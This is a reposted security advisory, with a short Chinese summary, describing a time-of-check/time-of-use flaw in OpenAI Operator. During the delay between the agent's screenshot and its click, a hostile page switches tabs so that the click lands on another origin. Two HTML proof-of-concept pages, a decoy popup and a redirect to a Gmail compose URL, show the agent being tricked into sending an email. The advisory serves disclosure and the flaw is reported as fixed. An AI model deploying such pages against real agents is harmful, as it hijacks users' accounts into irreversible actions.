OpenAI Operator - Click on arbitrary origin by TOCTOU attack

OpenAI Operator - Click on arbitrary origin by TOCTOU attack
OpenAI Operator存在一个高危漏洞：其基于截图的动作预测与实际触发之间存在延迟，攻击者可利用此延迟切换标签或导航至其他页面，导致操作在错误来源上执行。此漏洞允许攻击者在任意坐标和任意来源触发点击事件，引发不可逆状态变化。概念验证显示可利用该漏洞发送恶意邮件等操作。该漏洞于2025年5月报告并修复于7月17日。 2025-8-18 00:0:14 Author: github.com(查看原文) 阅读量:2 收藏

Summary

There is a delay between OpenAI Operator’s action prediction based on the screenshot and Operator’s actual action trigger. If timed correctly, an attacker can navigate or switch tabs between the delay, and actual action will be triggered on a wrong origin. While safety checks might detect something went wrong, this is too late as action was already triggered on the wrong origin.

Severity

High - This vulnerability allows an attacker to trigger click on arbitrary coordinates on arbitrary origin, which leads to irreversible state-changing action.

Proof of Concept

open_plz.html

<h2>Before accessing the page</h2>
<a href=# onclick=go()>Please read terms of accessing this website</a>
<script>
    function go(){
        window.open("/click_plz.html");
        location.href = "https://mail.google.com/mail/u/0/?fs=1&[email protected]&su=hi&body=Malicous%20Email%20Sent!&tf=cm";
    }
</script>

click_plz.html (change “6000” as required, but 6 seconds seems to work)

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Centered Promotional Popup</title>
    <style>
        /* Basic styling for the page */
        body {
            font-family: 'Inter', Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #e9e9e9; /* Light gray background to see the popup clearly */
            display: flex;
            align-items: center;
            justify-content: center;
            min-height: 100vh; /* Ensure body takes full viewport height */
        }

        /* Styling for the promotional popup */
        .promotional-popup {
            position: fixed; /* Fixed position to stay in place */
            top: 92%; /* Center vertically */
            left: 290px;
            transform: translate(-50%, -50%); /* Adjust for exact centering */
            width: 90%; /* Responsive width */
            max-width: 450px; /* Maximum width of the popup */
            background-color: #2d3748; /* Darker, more premium background */
            color: #f7fafc; /* Light text color for contrast */
            padding: 30px; /* Increased padding */
            box-shadow: 0 10px 25px rgba(0, 0, 0, 0.4); /* Enhanced shadow for a floating effect */
            z-index: 1000; /* Ensures it's on top */
            display: none; /* Hidden by default, shown by JavaScript */
            box-sizing: border-box;
            text-align: center;
            border-radius: 12px; /* Rounded corners */
        }

        .promotional-popup h2 { /* Changed paragraph to a heading for more impact */
            margin: 0 0 20px 0;
            font-size: 22px; /* Larger font for the offer */
            font-weight: 600;
            line-height: 1.4;
            color: #a0aec0; /* A slightly muted color for the heading text */
        }

        .promotional-popup .highlight { /* Class for highlighting text */
            color: #63b3ed; /* A bright blue to highlight the discount */
            font-weight: 700;
        }

        .promotional-popup .close-button {
            position: absolute;
            bottom: 10px;
            left: 20px;
            font-size: 28px;
            font-weight: bold;
            color: #a0aec0; /* Muted color for the close button */
            cursor: pointer;
            line-height: 1;
            transition: color 0.2s ease;
        }

        .promotional-popup .close-button:hover {
            color: #f7fafc; /* Brighter color on hover */
        }

        /* Responsive adjustments for smaller screens */
        @media (max-width: 480px) {
            .promotional-popup {
                padding: 25px;
                width: 95%;
            }
            .promotional-popup h2 {
                font-size: 20px;
            }
            .promotional-popup .close-button {
                font-size: 24px;
                top: 8px;
                right: 12px;
            }
        }
    </style>
</head>
<body>
<div></div>
    <div id="promoPopup" class="promotional-popup">
        <span id="closePromoButton" class="close-button" title="Close">&times;</span>
        <h2>Get subscription now with <span class="highlight">20% off!</span></h2>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            start = performance.now();
            setTimeout(()=>{
                window.close();
            }, 6000);
            const popup = document.getElementById('promoPopup');
            const closeButton = document.getElementById('closePromoButton');

            // Display the popup as soon as the DOM is ready
            if (popup) {
                popup.style.display = 'block'; // Make the popup visible
            }

            // Add event listener to the close button
            if (closeButton) {
                closeButton.addEventListener('click', function() {
                    stop = performance.now();
                    document.querySelector('div').textContent = stop - start;
                    // Hide the popup
                    if (popup) {
                        popup.style.display = 'none';
                    }
                });
            }
        });
    </script>

</body>
</html>

Timeline

Date reported: 2025-05-21
Date fixed: 2025-07-17
Date disclosed: 2025-08-18

文章来源: https://github.com/google/security-research/security/advisories/GHSA-mp56-7vrw-qxvf
如有侵权请联系:admin#unsafe.sh